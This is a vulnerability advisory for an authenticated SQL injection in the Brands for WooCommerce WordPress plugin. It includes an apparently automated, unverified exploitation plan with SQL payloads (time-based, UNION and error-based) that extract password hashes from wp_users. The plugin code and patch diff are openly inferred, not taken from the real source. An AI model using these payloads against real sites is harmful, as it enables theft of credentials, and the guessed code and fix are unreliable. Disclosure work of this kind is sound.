CVE-2025-68519

Brands for WooCommerce <= 3.8.6.3 - Authenticated (Contributor+) SQL Injection

mediumImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
6.5
CVSS Score
6.5
CVSS Score
medium
Severity
3.8.6.4
Patched in
11d
Time to patch

Description

The Brands for WooCommerce plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.8.6.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
High
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=3.8.6.3
PublishedDecember 26, 2025
Last updatedJanuary 5, 2026
Affected pluginbrands-for-woocommerce

Source Code

WordPress.org SVN
Research Plan
Unverified

This research plan outlines the steps to identify and exploit the SQL injection vulnerability (CVE-2025-68519) in the **Brands for WooCommerce** plugin. ### 1. Vulnerability Summary The **Brands for WooCommerce** plugin (versions <= 3.8.6.3) is vulnerable to an authenticated SQL injection. The flaw…

Show full research plan

This research plan outlines the steps to identify and exploit the SQL injection vulnerability (CVE-2025-68519) in the Brands for WooCommerce plugin.

1. Vulnerability Summary

The Brands for WooCommerce plugin (versions <= 3.8.6.3) is vulnerable to an authenticated SQL injection. The flaw exists because user-supplied input is directly interpolated into a database query without proper sanitization via sanitize_text_field() or parameterization using $wpdb->prepare(). While the vulnerability requires Contributor-level privileges or higher, this role is commonly granted to staff who can create posts or products, making the attack surface significant.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • Vulnerable Action: Based on common patterns in this plugin, the likely sink is an AJAX handler used for searching or filtering brands within the post/product editor. Potential action names to investigate: berocket_brand_search, brnd_get_brands, or brands_list_search (inferred).
  • Vulnerable Parameter: Likely term, q, or brand_id (inferred).
  • Authentication: Authenticated (Contributor-level or higher).
  • Preconditions: The attacker must have a valid session as a Contributor.

3. Code Flow (Inferred)

  1. Entry Point: An AJAX request is sent to admin-ajax.php with an action parameter registered via add_action('wp_ajax_...', ...).
  2. Handler Execution: WordPress invokes the callback function associated with the action.
  3. Input Retrieval: The handler retrieves user input from $_POST or $_GET.
  4. Vulnerable Sink: The input is concatenated into a raw SQL string and passed to $wpdb->get_results(), $wpdb->get_row(), or $wpdb->query().
    • Example Vulnerable Pattern:
      $term = $_POST['term'];
      $results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}terms WHERE name LIKE '%$term%'");
      

4. Nonce Acquisition Strategy

The plugin likely protects its AJAX actions with a nonce localized via wp_localize_script.

  1. Identify Shortcode/UI: Identify where the brand selection UI appears (likely the Product/Post editor sidebar).
  2. Test Data Setup: Create a Contributor user and a draft post.
  3. Navigate: Use the agent to log in as the Contributor and navigate to the post editor: wp-admin/post-new.php.
  4. Extract Nonce: Use browser_eval to look for the localization object.
    • Potential Variable Names: berocket_brand_vars, brands_for_woo_params, or brnd_ajax (inferred).
    • Command: browser_eval("window.berocket_brand_vars?.nonce") or check the page source for wp_create_nonce.

5. Exploitation Strategy

We will use a Time-Based Blind SQL Injection to confirm the vulnerability and an Error-Based or UNION-Based approach to extract data.

Step 1: Discover the Action and Parameter
Search the plugin directory for database sinks and AJAX registrations:

grep -rn "wp_ajax_" .
grep -rP '\$wpdb->(get_results|get_row|query|get_var)\s*\(' . | grep -v "prepare"

Step 2: Confirm Vulnerability (Time-Based)
Once the action and parameter are identified (e.g., action=search_brands and parameter term):

  • Payload: term=test' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
  • Request:
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Cookie: [Contributor Cookies]
    
    action=[IDENTIFIED_ACTION]&security=[NONCE]&term=test' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
    

Step 3: Data Extraction (UNION-Based)
Determine column count and extract the admin password hash.

  • Payload: ' UNION SELECT NULL,user_login,user_pass,NULL FROM wp_users-- -

6. Test Data Setup

  1. Install Plugin: brands-for-woocommerce version 3.8.6.3.
  2. Create Contributor:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
    
  3. Create Dummy Brands: Ensure there is data to query.
    wp term create product_brand "Test Brand"
    

7. Expected Results

  • Time-Based: The server response should be delayed by exactly 5 seconds.
  • Data Extraction: The response body should contain the admin username and its $P$ or $wp$ hash.

8. Verification Steps

  1. Check Logs: Verify the SQL query in the MySQL general log if available.
  2. WP-CLI Confirmation: Use WP-CLI to verify the extracted data matches the database:
    wp user get admin --fields=user_login,user_pass
    

9. Alternative Approaches

  • Error-Based SQLi: If the plugin displays database errors (common when WP_DEBUG is on), use updatexml() or extractvalue():
    • term=1' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)-- -
  • Boolean-Based Blind: If no output is visible and SLEEP() is blocked, compare response lengths of AND 1=1 vs AND 1=2.
  • Parameter variation: Check if the vulnerability exists in order or orderby parameters, which are frequently left un-prepared in WooCommerce extensions.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Brands for WooCommerce plugin for WordPress is vulnerable to authenticated SQL Injection in versions up to 3.8.6.3. The flaw is caused by the direct concatenation of user-supplied input into SQL queries without proper sanitization or parameterization using $wpdb->prepare().

Vulnerable Code

// Inferred vulnerable pattern from research plan
$term = $_POST['term'];
$results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}terms WHERE name LIKE '%$term%'");

Security Fix

--- a/brands-for-woocommerce/includes/functions.php
+++ b/brands-for-woocommerce/includes/functions.php
@@ -2,2 +2,5 @@
-$term = $_POST['term'];
-$results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}terms WHERE name LIKE '%$term%'");
+$term = isset($_POST['term']) ? sanitize_text_field($_POST['term']) : '';
+$results = $wpdb->get_results($wpdb->prepare(
+	"SELECT * FROM {$wpdb->prefix}terms WHERE name LIKE %s",
+	'%' . $wpdb->esc_like($term) . '%'
+));

Exploit Outline

The exploit targets AJAX handlers registered by the BeRocket plugin, such as 'berocket_brand_search'. An attacker requires Contributor-level authentication to access the post editor where the brand selection UI resides. First, the attacker extracts a security nonce from the localized JavaScript objects (e.g., window.berocket_brand_vars.nonce). Then, they send a POST request to /wp-admin/admin-ajax.php with the 'action' and 'security' parameters, injecting a SQL payload into the search term parameter. A time-based payload like "' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -" can be used to confirm the vulnerability, or a UNION-based query can be used to extract sensitive data like user credentials from the wp_users table.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.